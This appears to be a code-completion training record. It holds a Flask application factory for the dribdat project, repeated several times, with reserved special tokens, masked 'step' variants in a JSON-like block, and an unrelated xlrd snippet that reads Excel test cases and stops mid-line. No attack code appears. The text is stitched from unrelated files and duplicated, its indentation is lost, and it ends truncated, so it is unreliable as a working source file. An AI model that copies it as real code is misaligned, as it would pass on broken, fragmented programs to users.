@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate, public, max-age=0'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
if app.config['SERVER_CORS']:
CORS(app, resources={'/api/*': {'origins': '*'}})
app.config['CORS_HEADERS'] = 'Content-Type'
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
def init_mailman(app):
"""Initialize mailer support."""
if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:
if not app.config['MAIL_DEFAULT_SENDER']:
app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')
else:
mail = Mail()
mail.init_app(app)
def init_talisman(app):
"""Initialize Talisman support."""
if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:
Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],
frame_options_allow_from='*')
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix='/oauth')
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {'db': db, 'User': User}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
def register_filters(app):
"""Register filters for templates."""
Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables
=True)
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(value, app.oembed_providers, maxwidth=600,
maxheight=400)
app.tz = timezone(app.config['TIME_ZONE'])
app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='
)
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default='now!', until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None:
return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None:
return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers['Cache-Control'
] = 'no-cache, no-store, must-revalidate, public, max-age=0'
response.headers['Expires'] = 0
response.headers['Pragma'] = 'no-cache'
return response
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
from flask import Flask, render_template
from flask_cors import CORS
from flask_misaka import Misaka
from flask_mailman import Mail
from flask_talisman import Talisman
from werkzeug.middleware.proxy_fix import ProxyFix
from micawber.providers import bootstrap_basic
from whitenoise import WhiteNoise
from pytz import timezone
from urllib.parse import quote_plus
from dribdat import commands, public, admin
from dribdat.assets import assets # noqa: I005
from dribdat.sso import get_auth_blueprint
from dribdat.extensions import (
hashing,
cache,
db,
login_manager,
migrate,
)
from dribdat.settings import ProdConfig # noqa: I005
from dribdat.utils import timesince
from dribdat.onebox import make_oembedplus
def init_app(config_object=ProdConfig):
"""Define an application factory.
See: http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
# Set up cross-site access to the API
if app.config['SERVER_CORS']:
CORS(app, resources={r"/api/*": {"origins": "*"}})
app.config['CORS_HEADERS'] = 'Content-Type'
# Set up using an external proxy/static server
if app.config['SERVER_PROXY']:
app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)
else:
# Internally optimize static file hosting
app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')
for static in ('css', 'img', 'js', 'public'):
app.wsgi_app.add_files('dribdat/static/' + static)
register_extensions(app)
register_blueprints(app)
register_oauthhandlers(app)
register_errorhandlers(app)
register_filters(app)
register_loggers(app)
register_shellcontext(app)
register_commands(app)
register_caching(app)
return app
def register_extensions(app):
"""Register Flask extensions."""
assets.init_app(app)
hashing.init_app(app)
cache.init_app(app)
db.init_app(app)
login_manager.init_app(app)
migrate.init_app(app, db)
init_mailman(app)
init_talisman(app)
return None
def init_mailman(app):
"""Initialize mailer support."""
if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:
if not app.config['MAIL_DEFAULT_SENDER']:
app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')
else:
mail = Mail()
mail.init_app(app)
def init_talisman(app):
"""Initialize Talisman support."""
if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:
Talisman(app,
content_security_policy=app.config['CSP_DIRECTIVES'],
frame_options_allow_from='*')
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(public.views.blueprint)
app.register_blueprint(public.project.blueprint)
app.register_blueprint(public.auth.blueprint)
app.register_blueprint(public.api.blueprint)
app.register_blueprint(admin.views.blueprint)
return None
def register_oauthhandlers(app):
"""Set up OAuth handlers based on configuration."""
blueprint = get_auth_blueprint(app)
if blueprint is not None:
app.register_blueprint(blueprint, url_prefix="/oauth")
def register_errorhandlers(app):
"""Register error handlers."""
def render_error(error):
"""Render error template."""
# If a HTTPException, pull the `code` attribute; default to 500
error_code = getattr(error, 'code', 500)
return render_template('{0}.html'.format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
from dribdat.user.models import User
return {
'db': db,
'User': User}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
def register_filters(app):
"""Register filters for templates."""
#
# Conversion of Markdown to HTML
Misaka(app, autolink=True, fenced_code=True,
strikethrough=True, tables=True)
# Registration of handlers for micawber
app.oembed_providers = bootstrap_basic()
@app.template_filter()
def onebox(value):
return make_oembedplus(
value, app.oembed_providers, maxwidth=600, maxheight=400
)
# Timezone helper
app.tz = timezone(app.config['TIME_ZONE'])
# Lambda filters for safe image_url's
app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')
# Custom filters
@app.template_filter()
def since_date(value):
return timesince(value)
@app.template_filter()
def until_date(value):
return timesince(value, default="now!", until=True)
@app.template_filter()
def format_date(value, format='%d.%m.%Y'):
if value is None: return ''
return value.strftime(format)
@app.template_filter()
def format_datetime(value, format='%d.%m.%Y %H:%M'):
if value is None: return ''
return value.strftime(format)
def register_loggers(app):
"""Initialize and configure logging."""
if 'DEBUG' in app.config and not app.config['DEBUG']:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
def register_caching(app):
"""Prevent cached responses in debug."""
if 'DEBUG' in app.config and app.config['DEBUG']:
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate, public, max-age=0"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
|
flexible
|
{
"blob_id": "2257f73a290dfd428a874e963c26e51f1c1f1efa",
"index": 927,
"step-1": "<mask token>\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\n<mask token>\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\n<mask token>\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\n<mask token>\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n if app.config['SERVER_CORS']:\n CORS(app, resources={'/api/*': {'origins': '*'}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\n<mask token>\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix='/oauth')\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\n<mask token>\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate, public, max-age=0'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n",
"step-3": "<mask token>\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n if app.config['SERVER_CORS']:\n CORS(app, resources={'/api/*': {'origins': '*'}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\n<mask token>\n\n\ndef init_talisman(app):\n \"\"\"Initialize Talisman support.\"\"\"\n if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:\n Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],\n frame_options_allow_from='*')\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix='/oauth')\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\n<mask token>\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate, public, max-age=0'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n",
"step-4": "<mask token>\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n if app.config['SERVER_CORS']:\n CORS(app, resources={'/api/*': {'origins': '*'}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\ndef init_mailman(app):\n \"\"\"Initialize mailer support.\"\"\"\n if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:\n if not app.config['MAIL_DEFAULT_SENDER']:\n app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')\n else:\n mail = Mail()\n mail.init_app(app)\n\n\ndef init_talisman(app):\n \"\"\"Initialize Talisman support.\"\"\"\n if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:\n Talisman(app, content_security_policy=app.config['CSP_DIRECTIVES'],\n frame_options_allow_from='*')\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix='/oauth')\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {'db': db, 'User': User}\n app.shell_context_processor(shell_context)\n\n\ndef register_commands(app):\n \"\"\"Register Click commands.\"\"\"\n app.cli.add_command(commands.lint)\n app.cli.add_command(commands.clean)\n app.cli.add_command(commands.urls)\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n Misaka(app, autolink=True, fenced_code=True, strikethrough=True, tables\n =True)\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(value, app.oembed_providers, maxwidth=600,\n maxheight=400)\n app.tz = timezone(app.config['TIME_ZONE'])\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&='\n )\n\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default='now!', until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None:\n return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None:\n return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate, public, max-age=0'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"The app module, containing the app factory function.\"\"\"\n\nfrom flask import Flask, render_template\nfrom flask_cors import CORS\nfrom flask_misaka import Misaka\nfrom flask_mailman import Mail\nfrom flask_talisman import Talisman\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom micawber.providers import bootstrap_basic\nfrom whitenoise import WhiteNoise\nfrom pytz import timezone\nfrom urllib.parse import quote_plus\nfrom dribdat import commands, public, admin\nfrom dribdat.assets import assets # noqa: I005\nfrom dribdat.sso import get_auth_blueprint\nfrom dribdat.extensions import (\n hashing,\n cache,\n db,\n login_manager,\n migrate,\n)\nfrom dribdat.settings import ProdConfig # noqa: I005\nfrom dribdat.utils import timesince\nfrom dribdat.onebox import make_oembedplus\n\n\ndef init_app(config_object=ProdConfig):\n \"\"\"Define an application factory.\n\n See: http://flask.pocoo.org/docs/patterns/appfactories/\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__)\n app.config.from_object(config_object)\n\n # Set up cross-site access to the API\n if app.config['SERVER_CORS']:\n CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n app.config['CORS_HEADERS'] = 'Content-Type'\n\n # Set up using an external proxy/static server\n if app.config['SERVER_PROXY']:\n app.wsgi_app = ProxyFix(app, x_for=1, x_proto=1, x_host=1)\n else:\n # Internally optimize static file hosting\n app.wsgi_app = WhiteNoise(app.wsgi_app, prefix='static/')\n for static in ('css', 'img', 'js', 'public'):\n app.wsgi_app.add_files('dribdat/static/' + static)\n\n register_extensions(app)\n register_blueprints(app)\n register_oauthhandlers(app)\n register_errorhandlers(app)\n register_filters(app)\n register_loggers(app)\n register_shellcontext(app)\n register_commands(app)\n register_caching(app)\n return app\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n assets.init_app(app)\n hashing.init_app(app)\n cache.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n migrate.init_app(app, db)\n init_mailman(app)\n init_talisman(app)\n return None\n\n\ndef init_mailman(app):\n \"\"\"Initialize mailer support.\"\"\"\n if 'MAIL_SERVER' in app.config and app.config['MAIL_SERVER']:\n if not app.config['MAIL_DEFAULT_SENDER']:\n app.logger.warn('MAIL_DEFAULT_SENDER is required to send email')\n else:\n mail = Mail()\n mail.init_app(app)\n\n\ndef init_talisman(app):\n \"\"\"Initialize Talisman support.\"\"\"\n if 'SERVER_SSL' in app.config and app.config['SERVER_SSL']:\n Talisman(app,\n content_security_policy=app.config['CSP_DIRECTIVES'],\n frame_options_allow_from='*')\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n app.register_blueprint(public.views.blueprint)\n app.register_blueprint(public.project.blueprint)\n app.register_blueprint(public.auth.blueprint)\n app.register_blueprint(public.api.blueprint)\n app.register_blueprint(admin.views.blueprint)\n return None\n\n\ndef register_oauthhandlers(app):\n \"\"\"Set up OAuth handlers based on configuration.\"\"\"\n blueprint = get_auth_blueprint(app)\n if blueprint is not None:\n app.register_blueprint(blueprint, url_prefix=\"/oauth\")\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n # If a HTTPException, pull the `code` attribute; default to 500\n error_code = getattr(error, 'code', 500)\n return render_template('{0}.html'.format(error_code)), error_code\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_shellcontext(app):\n \"\"\"Register shell context objects.\"\"\"\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {\n 'db': db,\n 'User': User}\n\n app.shell_context_processor(shell_context)\n\n\ndef register_commands(app):\n \"\"\"Register Click commands.\"\"\"\n app.cli.add_command(commands.lint)\n app.cli.add_command(commands.clean)\n app.cli.add_command(commands.urls)\n\n\ndef register_filters(app):\n \"\"\"Register filters for templates.\"\"\"\n #\n # Conversion of Markdown to HTML\n Misaka(app, autolink=True, fenced_code=True,\n strikethrough=True, tables=True)\n\n # Registration of handlers for micawber\n app.oembed_providers = bootstrap_basic()\n\n @app.template_filter()\n def onebox(value):\n return make_oembedplus(\n value, app.oembed_providers, maxwidth=600, maxheight=400\n )\n\n # Timezone helper\n app.tz = timezone(app.config['TIME_ZONE'])\n\n # Lambda filters for safe image_url's\n app.jinja_env.filters['quote_plus'] = lambda u: quote_plus(u or '', ':/?&=')\n\n # Custom filters\n @app.template_filter()\n def since_date(value):\n return timesince(value)\n\n @app.template_filter()\n def until_date(value):\n return timesince(value, default=\"now!\", until=True)\n\n @app.template_filter()\n def format_date(value, format='%d.%m.%Y'):\n if value is None: return ''\n return value.strftime(format)\n\n @app.template_filter()\n def format_datetime(value, format='%d.%m.%Y %H:%M'):\n if value is None: return ''\n return value.strftime(format)\n\n\ndef register_loggers(app):\n \"\"\"Initialize and configure logging.\"\"\"\n if 'DEBUG' in app.config and not app.config['DEBUG']:\n import logging\n stream_handler = logging.StreamHandler()\n app.logger.addHandler(stream_handler)\n app.logger.setLevel(logging.INFO)\n\n\ndef register_caching(app):\n \"\"\"Prevent cached responses in debug.\"\"\"\n if 'DEBUG' in app.config and app.config['DEBUG']:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate, public, max-age=0\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n",
"step-ids": [
5,
9,
10,
12,
14
]
}
|
[
5,
9,
10,
12,
14
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_teacherData():
excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True)
workSheet = workBook.sheet_by_name('3-老师模块')
dataList = []
for cnt in range(1, 2):
cellData = workSheet.cell_value(cnt, 6)
repsCellData = workSheet.cell_value(cnt, 8)
dataList.append((cellData, repsCellData))
return dataList
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_teacherData():
excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True)
workSheet = workBook.sheet_by_name('3-老师模块')
dataList = []
for cnt in range(1, 2):
cellData = workSheet.cell_value(cnt, 6)
repsCellData = workSheet.cell_value(cnt, 8)
dataList.append((cellData, repsCellData))
return dataList
get_teacherData()
<|reserved_special_token_1|>
import xlrd
def get_teacherData():
excelDir = '../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True)
workSheet = workBook.sheet_by_name('3-老师模块')
dataList = []
for cnt in range(1, 2):
cellData = workSheet.cell_value(cnt, 6)
repsCellData = workSheet.cell_value(cnt, 8)
dataList.append((cellData, repsCellData))
return dataList
get_teacherData()
<|reserved_special_token_1|>
#time:2020-11-28
import xlrd #读取库
def get_teacherData():
excelDir = r'../data/松勤-教管系统接口测试用例-v1.4.xls'
workBook = xlrd.open_workbook(excelDir, formatting_info=True) # 保存原样---样式
# 2-操作对应的用例表
workSheet = workBook.sheet_by_name('3-老师模块') # 通过表名获取
dataList = []
for cnt in range(1, 2): # 到第四行
cellData = workSheet.cell_value(cnt, 6) # 取第6列 字符串类型
repsCellData = workSheet.cell_value(cnt, 8) # 取第8列 字符串类型 预期结果
